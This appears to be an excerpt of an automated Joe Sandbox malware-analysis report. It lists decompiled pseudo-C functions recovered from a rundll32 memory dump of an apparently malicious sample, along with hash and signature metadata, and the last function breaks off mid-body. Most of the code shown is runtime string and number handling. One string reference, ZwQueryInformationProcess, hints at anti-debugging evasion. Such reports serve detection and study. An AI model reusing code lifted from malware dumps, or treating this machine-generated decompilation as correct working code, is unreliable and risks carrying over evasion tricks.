                • Opcode Fuzzy Hash: 2a4119c427f675659302ac9c4084ee3897c0f4525e6df9514648f93a5a6e469d
                • Instruction Fuzzy Hash: 48018833212E64C2EB20CB39D85965973A0FFD8B68F584141CD5E466A8DF34C059CB44
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000215215205FBD10(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, signed int __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                				void* _t70;
                				intOrPtr _t81;
                				unsigned int _t89;
                				signed int _t96;
                				signed int _t98;
                				char _t100;
                				signed int _t104;
                				unsigned int _t113;
                				void* _t135;
                				signed int _t145;
                
                				_t145 = __rsi;
                				_a8 = __rbx;
                				_a16 = __rbp;
                				_a24 = __rsi;
                				_t135 = __rcx;
                				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x205fbd4a;
                				_t70 = E0000021521520603944(__rax);
                				 *__rax = 0x16;
                				E00000215215205FAABC(_t70);
                				goto 0x205fbef9;
                				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0x205fbd32;
                				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x205fbef6;
                				_t104 = __edi | 0xffffffff;
                				 *((intOrPtr*)(__rcx + 0x50)) = 0;
                				 *(__rcx + 0x2c) = 0;
                				goto 0x205fbec3;
                				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
                				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x205fbed8;
                				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x205fbda0;
                				_t130 =  *((char*)(__rcx + 0x41));
                				goto 0x205fbda2;
                				_t89 = ( *(__rcx + 0x206302b0) & 0x000000ff) >> 4;
                				 *(__rcx + 0x2c) = _t89;
                				if (_t89 == 8) goto 0x205fbf0e;
                				_t113 = _t89;
                				if (_t113 == 0) goto 0x205fbeb7;
                				if (_t113 == 0) goto 0x205fbea3;
                				if (_t113 == 0) goto 0x205fbe6e;
                				if (_t113 == 0) goto 0x205fbe42;
                				if (_t113 == 0) goto 0x205fbe3a;
                				if (_t113 == 0) goto 0x205fbe0d;
                				if (_t113 == 0) goto 0x205fbe00;
                				if (_t89 - 0xfffffffffffffffc != 1) goto 0x205fbf1e;
                				E00000215215205FCCD8( *((char*)(__rcx + 0x41)), __rcx, __rcx, __rsi, 0x206302b0);
                				goto 0x205fbebf;
                				E00000215215205FC73C(_t130, _t135);
                				goto 0x205fbebf;
                				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0x205fbe24;
                				E00000215215205FB9FC(_t135, _t135, _t135 + 0x38);
                				goto 0x205fbebf;
                				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
                				_t96 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
                				_t97 =  <  ? _t104 : _t96;
                				 *(_t135 + 0x38) =  <  ? _t104 : _t96;
                				goto 0x205fbe6a;
                				 *(_t135 + 0x38) = 0;
                				goto 0x205fbec3;
                				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0x205fbe4e;
                				goto 0x205fbe17;
                				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
                				_t98 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
                				 *(_t135 + 0x34) = _t98;
                				if (_t98 >= 0) goto 0x205fbe6a;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
                				 *(_t135 + 0x34) =  ~_t98;
                				goto 0x205fbebf;
                				_t81 =  *((intOrPtr*)(_t135 + 0x41));
                				if (_t81 == 0x20) goto 0x205fbe9d;
                				if (_t81 == 0x23) goto 0x205fbe97;
                				if (_t81 == 0x2b) goto 0x205fbe91;
                				if (_t81 == 0x2d) goto 0x205fbe8b;
                				if (_t81 != 0x30) goto 0x205fbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000008;
                				goto 0x205fbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
                				goto 0x205fbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000001;
                				goto 0x205fbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000020;
                				goto 0x205fbec3;
                				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000002;
                				goto 0x205fbec3;
                				 *(_t135 + 0x30) = _t145;
                				 *((intOrPtr*)(_t135 + 0x40)) = sil;
                				 *(_t135 + 0x38) = _t104;
                				 *((intOrPtr*)(_t135 + 0x3c)) = 0;
                				 *((intOrPtr*)(_t135 + 0x54)) = sil;
                				goto 0x205fbec3;
                				if (E00000215215205FC420(_t135) == 0) goto 0x205fbf1e;
                				_t100 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x18))));
                				 *((char*)(_t135 + 0x41)) = _t100;
                				if (_t100 != 0) goto 0x205fbd78;
                				 *((long long*)(_t135 + 0x18)) =  *((long long*)(_t135 + 0x18)) + 1;
                				if ( *((intOrPtr*)(_t135 + 0x2c)) == 0) goto 0x205fbee3;
                				if ( *((intOrPtr*)(_t135 + 0x2c)) != 7) goto 0x205fbf0e;
                				 *((intOrPtr*)(_t135 + 0x470)) =  *((intOrPtr*)(_t135 + 0x470)) + 1;
                				if ( *((intOrPtr*)(_t135 + 0x470)) != 2) goto 0x205fbd6d;
                				return  *((intOrPtr*)(_t135 + 0x28));
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: $*
                • API String ID: 3215553584-3982473090
                • Opcode ID: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction ID: 3cc46e6eb7cf7bf38cc1868b315ff5948a8a36bf956c0abfd574b66a6930dc21
                • Opcode Fuzzy Hash: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction Fuzzy Hash: AE614E73606E70C6F7689E28805D3EC3BB9EBA6B48F141199DF460229DC738C445CB45
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: ZwQueryInformationProcess$ntdll.dll
                • API String ID: 1646373207-132032222
                • Opcode ID: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction ID: 10d08677f1904a7a4d95a20fab55a3b22130daf705ae28c9ffddeb61372d3b71
                • Opcode Fuzzy Hash: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction Fuzzy Hash: 8B516833316B60C2EE25CB19E4587D977A0FFE8B84F4440699E4D47B98DF78DA058780
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 30%
                			E000002152152060FE44(void* __edx, void* __esp, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8) {
                				int _t35;
                				int _t38;
                				signed long long _t76;
                				signed long long _t78;
                				intOrPtr* _t86;
                				signed long long _t93;
                				signed long long _t108;
                				void* _t109;
                				void* _t110;
                				void* _t111;
                
                				_t110 = _t109 - 0x60;
                				_t108 = _t110 + 0x30;
                				 *((long long*)(_t108 + 0x60)) = __rbx;
                				 *((long long*)(_t108 + 0x68)) = __rsi;
                				 *((long long*)(_t108 + 0x70)) = __rdi;
                				_t76 =  *0x2067c720; // 0xca1645d940e
                				 *(_t108 + 0x20) = _t76 ^ _t108;
                				r13d = __edx;
                				r15d = r9d;
                				E00000215215205FA5D4(_t76 ^ _t108, __rbx, _t108, __rcx);
                				if ( *((intOrPtr*)(_t108 + 0x88)) != 0) goto 0x2060fe97;
                				_t78 =  *((intOrPtr*)(_t108 + 8));
                				 *(_t108 + 0x90) =  ~( *(_t108 + 0x90));
                				r9d = r15d;
                				asm("sbb edx, edx");
                				 *(_t110 + 0x28) =  *(_t110 + 0x28) & 0x00000000;
                				 *(_t110 + 0x20) =  *(_t110 + 0x20) & 0x00000000;
                				_t35 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                				if (_t35 != 0) goto 0x2060fecb;
                				goto 0x2060ffbc;
                				_t104 = _t35 + _t35;
                				_t15 = _t104 + 0x10; // 0x18
                				asm("dec eax");
                				if ((_t15 & _t78) == 0) goto 0x2060ff55;
                				_t18 = _t104 + 0x10; // 0x18
                				_t93 = _t18;
                				asm("dec eax");
                				_t19 = _t104 + 0x10; // 0x18
                				if ((_t78 & _t93) - 0x400 > 0) goto 0x2060ff33;
                				asm("dec eax");
                				_t20 = (_t93 & _t19) + 0xf; // 0x27
                				if (_t20 - (_t93 & _t19) > 0) goto 0x2060ff15;
                				E00000215215205F5A80();
                				_t111 = _t110 - 0xfffffff0;
                				_t86 = _t111 + 0x30;
                				if (_t86 == 0) goto 0x2060ffa4;
                				 *_t86 = 0xcccc;
                				goto 0x2060ff4f;
                				asm("dec eax");
                				E0000021521520603D7C(0xffffffffffffff0, _t93 & _t19 & 0xfffffff0);
                				if (0xfffffff0 == 0) goto 0x2060ff57;
                				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
                				goto 0x2060ff57;
                				if (0xfffffff0 == 0) goto 0x2060ffa4;
                				E00000215215205F8EF0( *((intOrPtr*)(_t78 + 0xc)), 0, 0, __esp, 0xfffffff0, __rcx, _t35 + _t35, _t35 + _t35);
                				r9d = r15d;
                				 *((intOrPtr*)(_t111 + 0x28)) = r14d;
                				 *((long long*)(_t111 + 0x20)) = 0xfffffff0;
                				_t38 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
                				if (_t38 == 0) goto 0x2060ffa4;
                				r8d = _t38;
                				GetStringTypeW(??, ??, ??, ??);
                				goto 0x2060ffa6;
                				if (0xfffffff0 == 0) goto 0x2060ffbc;
                				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0x2060ffbc;
                				E000002152152060A780(0xffffffffffffff0, 0xffffffffffffff0);
                				if ( *((char*)(_t108 + 0x18)) == 0) goto 0x2060ffcd;
                				 *( *_t108 + 0x3a8) =  *( *_t108 + 0x3a8) & 0xfffffffd;
                				return E00000215215205F59D0(r13d,  *(_t108 + 0x20) ^ _t108, 0xfffffff0,  *((intOrPtr*)(_t108 + 0x80)));
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$StringType
                • String ID: %02x
                • API String ID: 3586891840-560843007
                • Opcode ID: 13ab8f9af3b798140b8e51c64361ebaa2f6a1554843be369156d75395636cafa
                • Instruction ID: f99b0d5681cd10c3bc0d112ad91c4a70415253450bc29f2c7834e49729a43ec6
                • Opcode Fuzzy Hash: 13ab8f9af3b798140b8e51c64361ebaa2f6a1554843be369156d75395636cafa
                • Instruction Fuzzy Hash: DF418433352B918AEF308F25D8087DA6392FBA5BA8F584565AE5D47BD8DF38E4418300
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharErrorFileLastMultiWideWrite
                • String ID: U
                • API String ID: 2456169464-4171548499
                • Opcode ID: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction ID: b0f83e618ff7f4f053d1a05c155f389c7799a95f2fe479626a6fe59c853baba3
                • Opcode Fuzzy Hash: 4075517f7857747b7ea44fef219e885793f2915a22ae05a0ce25cc65d5e7b8de
                • Instruction Fuzzy Hash: A241F2A2B28B8186E7209F25E8447AE67A6FBD9780F489031EE4D97788DF3CD010C700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharErrorFileLastMultiWideWrite
                • String ID: U
                • API String ID: 2456169464-4171548499
                • Opcode ID: f2060908e614403caa3aa922cb5b982ee00030681d8560858e98b455461f9808
                • Instruction ID: f306df2a21e631c9ef55831043c9bb906594af9a0bbb5a4b2f86c80f79ef0c2e
                • Opcode Fuzzy Hash: f2060908e614403caa3aa922cb5b982ee00030681d8560858e98b455461f9808
                • Instruction Fuzzy Hash: 8F419233316E90C6EB208F65E8487EAA7A1FBE8794F944121EE4D87798DB7CD445C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00000215215206040E8(void* __edx, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, long long _a8, signed int _a16, void* _a24, signed int _a32) {
                				long long _v64;
                				long long _v72;
                				char _v80;
                				signed int* _v88;
                				void* __rdi;
                				void* __rsi;
                				void* __r14;
                				void* _t88;
                				signed int _t96;
                				void* _t102;
                				signed int _t115;
                				signed int _t125;
                				void* _t129;
                				void* _t150;
                				signed int _t161;
                				signed int _t162;
                				signed int _t163;
                				signed int _t164;
                				signed int _t165;
                				signed int _t167;
                				signed int _t176;
                				signed int _t178;
                				signed int _t179;
                				signed int _t180;
                				signed int _t181;
                				signed int _t182;
                				signed int _t183;
                				intOrPtr* _t265;
                				intOrPtr* _t269;
                				intOrPtr _t270;
                				intOrPtr* _t271;
                				intOrPtr* _t273;
                				signed long long _t274;
                				intOrPtr* _t276;
                				intOrPtr* _t278;
                				intOrPtr* _t282;
                				signed long long _t283;
                				intOrPtr* _t285;
                				intOrPtr* _t287;
                				intOrPtr* _t288;
                				intOrPtr* _t290;
                				signed long long _t291;
                				intOrPtr* _t292;
                				intOrPtr* _t294;
                				intOrPtr* _t296;
                				intOrPtr* _t298;
                				intOrPtr* _t299;
                				intOrPtr* _t300;
                				signed long long* _t302;
                				signed long long _t306;
                				signed long long _t307;
                				char* _t309;
                				long long _t313;
                				signed long long _t314;
                				signed long long _t315;
                				void* _t318;
                				signed long long _t319;
                				char* _t320;
                				intOrPtr* _t326;
                				void* _t329;
                				signed int* _t330;
                				signed int* _t331;
                				long long _t332;
                				signed int* _t333;
                				signed int* _t334;
                				signed int* _t335;
                				intOrPtr* _t337;
                
                				_t313 = __rdx;
                				_a8 = __rbx;
                				_a24 = __r8;
                				_t265 =  *((intOrPtr*)(__rdx));
                				_t332 = __r8;
                				_t302 = __rdx;
                				_t337 = __rcx;
                				if (_t265 != 0) goto 0x20604131;
                				_t88 = E0000021521520603944(_t265);
                				 *_t265 = 0x16;
                				E00000215215205FAABC(_t88);
                				goto 0x206045b9;
                				_v88 = _t265;
                				_t172 =  *_t265;
                				 *((long long*)(__rdx)) = _t265 + 1;
                				_v72 =  &_a16;
                				_v64 =  &_v88;
                				_v80 = __rdx;
                				_a16 =  *_t265;
                				if (__rcx == 0) goto 0x20604185;
                				_t269 =  *__rcx;
                				if ( *((intOrPtr*)(_t269 + 8)) - 1 <= 0) goto 0x20604176;
                				_t326 = __rcx;
                				E000002152152060BE68(_t172 & 0x000000ff, 8, 0,  *((intOrPtr*)(_t269 + 8)) - 1, __rdx, _t318, _t319, __rcx, _t329, __r8);
                				goto 0x20604191;
                				_t270 =  *_t269;
                				goto 0x20604194;
                				E0000021521520607CB0(_t270);
                				_t96 =  *(_t270 + _t319 * 2) & 8;
                				if (_t96 == 0) goto 0x206041a5;
                				_t271 =  *_t302;
                				 *_t302 = _t271 + 1;
                				goto 0x20604151;
                				_t320 = _t332 + 0x308;
                				 *_t320 = _t96 & 0xffffff00 |  *_t271 == 0x0000002d;
                				if ((_t313 - 0x0000002b & 0x000000fd) != 0) goto 0x206041c9;
                				_t273 =  *_t302;
                				_t176 =  *_t273;
                				_t274 = _t273 + 1;
                				 *_t302 = _t274;
                				_a16 = _t176;
                				r10b = 0xdf;
                				if ((r10b & _t313 - 0x00000049) == 0) goto 0x206045a9;
                				_t26 = _t313 - 0x4e; // 0x91
                				if ((r10b & _t26) == 0) goto 0x20604597;
                				r12b = dil;
                				if (_t176 != 0x30) goto 0x2060423a;
                				_t330 =  *_t302;
                				r8b =  *_t330;
                				_t306 =  &(_t330[0]);
                				 *_t302 = _t306;
                				if ((r10b & _t326 - 0x00000058) == 0) goto 0x20604227;
                				_t307 = _t306 - 1;
                				 *_t302 = _t307;
                				if (r8b == 0) goto 0x2060423a;
                				if ( *_t307 == r8b) goto 0x2060423a;
                				_t102 = E0000021521520603944(_t274);
                				 *_t274 = 0x16;
                				E00000215215205FAABC(_t102);
                				goto 0x2060423a;
                				_t178 =  *_t307;
                				_a16 = _t178;
                				r12b = 1;
                				 *_t302 = _t307 + 1;
                				_v88 = _t330;
                				_t331 = _t332 + 8;
                				r10d = 0;
                				_t333 = _t331;
                				r8b = dil;
                				if (_t178 != 0x30) goto 0x20604262;
                				r8b = 1;
                				_t276 =  *_t302;
                				_t179 =  *_t276;
                				_a16 = _t179;
                				 *_t302 = _t276 + 1;
                				if (_t179 == 0x30) goto 0x2060424f;
                				r11b = 0x19;
                				asm("inc ebp");
                				r9d = r9d & 0x00000006;
                				r9d = r9d + 9;
                				_t39 = _t313 - 0x30; // 0xaf
                				if (_t39 - 9 > 0) goto 0x20604284;
                				goto 0x206042a7;
                				_t40 = _t313 - 0x61; // 0x7e
                				if (_t40 - r11b > 0) goto 0x20604294;
                				goto 0x206042a7;
                				_t41 = _t313 - 0x41; // 0x9e
                				if (_t41 - r11b > 0) goto 0x206042a4;
                				goto 0x206042a7;
                				_t115 = _t179 - 0x00000037 | 0xffffffff;
                				if (_t115 - r9d > 0) goto 0x206042cd;
                				r8b = 1;
                				if (_t333 == _t320) goto 0x206042ba;
                				 *_t333 = _t115;
                				_t334 =  &(_t333[0]);
                				_t278 =  *_t302;
                				r10d = r10d + 1;
                				_t180 =  *_t278;
                				 *_t302 = _t278 + 1;
                				_a16 = _t180;
                				goto 0x20604275;
                				_a32 = r10d;
                				if (_t180 !=  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t337 + 0xf8))))))) goto 0x2060436d;
                				_t282 =  *_t302;
                				_t181 =  *_t282;
                				_t283 = _t282 + 1;
                				_a16 = _t181;
                				 *_t302 = _t283;
                				if (_t334 != _t331) goto 0x20604318;
                				if (_t181 != 0x30) goto 0x20604318;
                				r8b = 1;
                				_t182 =  *_t283;
                				r10d = r10d - 1;
                				_a16 = _t182;
                				 *_t302 = _t283 + 1;
                				if (_t182 == 0x30) goto 0x20604301;
                				_a32 = r10d;
                				_t48 = _t313 - 0x30; // 0xaf
                				if (_t48 - 9 > 0) goto 0x20604327;
                				goto 0x2060434a;
                				_t49 = _t313 - 0x61; // 0x7e
                				if (_t49 - r11b > 0) goto 0x20604337;
                				goto 0x2060434a;
                				_t50 = _t313 - 0x41; // 0x9e
                				if (_t50 - r11b > 0) goto 0x20604347;
                				goto 0x2060434a;
                				_t125 = _t182 - 0x00000037 | 0xffffffff;
                				if (_t125 - r9d > 0) goto 0x2060436d;
                				r8b = 1;
                				if (_t334 == _t320) goto 0x2060435d;
                				 *_t334 = _t125;
                				_t335 =  &(_t334[0]);
                				_t285 =  *_t302;
                				_t183 =  *_t285;
                				 *_t302 = _t285 + 1;
                				_a16 = _t183;
                				goto 0x20604318;
                				if (r8b != 0) goto 0x20604393;
                				_t309 =  &_v80;
                				if (E0000021521520604910(_t183, _t309) == 0) goto 0x20604127;
                				r12b =  ~r12b;
                				asm("sbb eax, eax");
                				goto 0x206045b9;
                				 *_t302 =  *_t302 - 1;
                				_t287 =  *_t302;
                				if (_t183 == 0) goto 0x206043b4;
                				if ( *_t287 == _t183) goto 0x206043b4;
                				_t129 = E0000021521520603944(_t287);
                				 *_t287 = 0x16;
                				E00000215215205FAABC(_t129);
                				r11b = 0x19;
                				_t288 =  *_t302;
                				_v88 = _t288;
                				_t161 =  *_t288;
                				_t54 = _t288 + 1; // 0x1
                				_t314 = _t54;
                				_a16 = _t161;
                				 *_t302 = _t314;
                				if (_t161 == 0x45) goto 0x206043e3;
                				if (_t161 == 0x50) goto 0x206043de;
                				if (_t161 == 0x65) goto 0x206043e3;
                				if (_t161 != 0x70) goto 0x206043e9;
                				goto 0x206043e9;
                				r15d = 0x1450;
                				if ((r12b & 0xffffff00 | r12b == 0x00000000) == 0) goto 0x20604508;
                				_t162 =  *_t314;
                				_t315 = _t314 + 1;
                				_a16 = _t162;
                				 *_t302 = _t315;
                				r9b = _t162 == 0x2d;
                				if ((_t309 - 0x0000002b & 0x000000fd) != 0) goto 0x2060441e;
                				_t163 =  *_t315;
                				_t62 = _t315 + 1; // 0xa1
                				_a16 = _t163;
                				 *_t302 = _t62;
                				r8b = dil;
                				if (_t163 != 0x30) goto 0x2060443c;
                				r8b = 1;
                				_t290 =  *_t302;
                				_t164 =  *_t290;
                				_t291 = _t290 + 1;
                				_a16 = _t164;
                				 *_t302 = _t291;
                				if (_t164 == 0x30) goto 0x20604429;
                				if (_t309 - 0x30 - 9 > 0) goto 0x2060444b;
                				goto 0x2060446e;
                				if (_t309 - 0x61 - r11b > 0) goto 0x2060445b;
                				goto 0x2060446e;
                				if (_t309 - 0x41 - r11b > 0) goto 0x2060446b;
                				goto 0x2060446e;
                				if ((_t164 - 0x00000037 | 0xffffffff) - 0xa >= 0) goto 0x20604496;
                				r8b = 1;
                				if (_t315 + _t291 * 2 - r15d > 0) goto 0x20604491;
                				_t292 =  *_t302;
                				_t165 =  *_t292;
                				 *_t302 = _t292 + 1;
                				_a16 = _t165;
                				goto 0x2060443c;
                				if (_t309 - 0x30 - 9 > 0) goto 0x206044a5;
                				goto 0x206044c8;
                				if (_t309 - 0x61 - r11b > 0) goto 0x206044b5;
                				goto 0x206044c8;
                				if (_t309 - 0x41 - r11b > 0) goto 0x206044c5;
                				goto 0x206044c8;
                				if ((_t165 - 0x00000037 | 0xffffffff) - 0xa >= 0) goto 0x206044dd;
                				_t294 =  *_t302;
                				 *_t302 = _t294 + 1;
                				_a16 =  *_t294;
                				goto 0x20604496;
                				if (r9b == 0) goto 0x206044e4;
                				if (r8b != 0) goto 0x20604508;
                				if (E0000021521520604910(_t164 - 0x00000037 | 0xffffffff,  &_v80) == 0) goto 0x20604127;
                				_t296 =  *_t302;
                				_t167 =  *_t296;
                				 *_t302 = _t296 + 1;
                				_a16 = _t167;
                				 *_t302 =  *_t302 - 1;
                				_t298 =  *_t302;
                				if (_t167 == 0) goto 0x20604526;
                				if ( *_t298 == _t167) goto 0x20604526;
                				_t150 = E0000021521520603944(_t298);
                				 *_t298 = 0x16;
                				E00000215215205FAABC(_t150);
                				if (_t335 == _t331) goto 0x20604590;
                				_t299 = _t335 - 1;
                				if ( *_t299 != dil) goto 0x2060453c;
                				if (_t299 != _t331) goto 0x2060452b;
                				if (_t299 == _t331) goto 0x20604590;
                				if (0x1451 - r15d <= 0) goto 0x2060454d;
                				goto 0x206045b9;
                				if (0x1451 - 0xffffebb0 >= 0) goto 0x2060455d;
                				goto 0x206045b9;
                				asm("sbb ecx, ecx");
                				if (0x1451 - r15d > 0) goto 0x20604546;
                				if (0x1451 - 0xffffebb0 < 0) goto 0x20604556;
                				_t300 = _a24;
                				r14d = r14d - r13d;
                				dil = r12b != 0;
                				 *_t300 =  ~0x1451 + ((_t167 & 0x00000003) + 1) * _a32;
                				 *((intOrPtr*)(_t300 + 4)) = r14d;
                				goto 0x206045b9;
                				goto 0x206045b9;
                				E00000215215206046EC(_t302,  &_a16, _t302, _v88);
                				goto 0x206045b9;
                				return E00000215215206045D4(_t302,  &_a16, _t302, _t320, _v88);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 51b95306e726cbddc1d74205708729bd795067a530f6109319b3ec0ab3a0e4c2
                • Instruction ID: 37e58aa907c7e3a16b5e17e338c1f749b816dec145f5cdc540098cf5a8d1f834
                • Opcode Fuzzy Hash: 51b95306e726cbddc1d74205708729bd795067a530f6109319b3ec0ab3a0e4c2
                • Instruction Fuzzy Hash: 7FF107B3146EA4CAE7358F25C4883EE3BE2FFA1B88F644091DE4943B99D6399449C301
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CriticalSection$EnterLeave$CloseHandle
                • String ID:
                • API String ID: 3705054111-0
                • Opcode ID: e38053a851f4876fe9df03b08bdd8084867996511b354070ca755d3317f7f365
                • Instruction ID: 8d000f2fc016613f4878b9f7de65d46db8f6d8a28d14cf9bbd4b389f02f95363
                • Opcode Fuzzy Hash: e38053a851f4876fe9df03b08bdd8084867996511b354070ca755d3317f7f365
                • Instruction Fuzzy Hash: E031E372202F9086DB54DF26E44465973A4F799FA4B2847159EB903BE8DF38D4A2C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00000215215205C85EC(signed int __ebx, void* __edi, signed int __esi, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r9) {
                				void* __rbx;
                				void* __rdi;
                				void* __rsi;
                				void* _t116;
                				signed int _t117;
                				void* _t137;
                				intOrPtr* _t155;
                				void* _t187;
                				long long _t188;
                				intOrPtr* _t199;
                				long long* _t209;
                				void* _t220;
                				long long* _t221;
                				void* _t223;
                				void* _t225;
                				intOrPtr _t226;
                				void* _t228;
                				intOrPtr* _t229;
                				void* _t231;
                				void* _t232;
                				void* _t234;
                				long long _t237;
                				void* _t239;
                				long long _t240;
                				void* _t242;
                				intOrPtr* _t243;
                				void* _t245;
                				intOrPtr* _t246;
                
                				_t138 = __eflags;
                				_t117 = __ebx;
                				_t239 = _t231;
                				 *(_t239 + 0x20) = r9d;
                				 *((long long*)(_t239 + 8)) = __rcx;
                				_t232 = _t231 - 0x40;
                				 *((long long*)(_t239 - 0x58)) = 0xfffffffe;
                				_t246 = __rdx;
                				_t243 = __rcx;
                				r12d = 0;
                				 *(_t239 + 0x20) = r12d;
                				 *((long long*)(__rcx)) = 0x206401c8;
                				_t229 = __rcx + 0x10;
                				 *_t229 = 0x20640100;
                				 *((long long*)(__rcx + 0x98)) = 0x20640110;
                				 *(_t239 + 0x20) = 1;
                				 *((long long*)( *((intOrPtr*)( *__rcx + 4)) + __rcx)) = 0x206401c0;
                				 *((intOrPtr*)( *((intOrPtr*)( *__rcx + 4)) + __rcx - 4)) =  *((intOrPtr*)( *__rcx + 4)) - 0x18;
                				 *((long long*)(__rcx + 8)) = _t240;
                				_t155 =  *__rcx;
                				_t225 =  *((intOrPtr*)(_t155 + 4)) + __rcx;
                				 *((long long*)(_t225 + 0x40)) = _t240;
                				 *((long long*)(_t225 + 8)) = _t240;
                				 *(_t225 + 0x14) = r12d;
                				 *((intOrPtr*)(_t225 + 0x18)) = 0x201;
                				 *((long long*)(_t225 + 0x20)) = 6;
                				 *((long long*)(_t225 + 0x28)) = _t240;
                				 *((long long*)(_t225 + 0x30)) = _t240;
                				 *((long long*)(_t225 + 0x38)) = _t240;
                				r8d = 0;
                				E00000215215205C7C20(0, __eflags, _t225);
                				E00000215215205F4DCC(_t155, _t225);
                				_t188 = _t155;
                				E00000215215205D6CC8(1, _t188, _t225, _t234);
                				 *((long long*)(_t188 + 8)) = _t155;
                				 *((long long*)(_t225 + 0x40)) = _t188;
                				_t221 = _t243 + 0x18;
                				 *((long long*)(_t225 + 0x48)) = _t221;
                				 *((long long*)(_t225 + 0x50)) = _t240;
                				E00000215215205C7D14(_t225, _t232 + 0x28);
                				E00000215215205C8328(__edi, _t138, _t155, _t188, _t155);
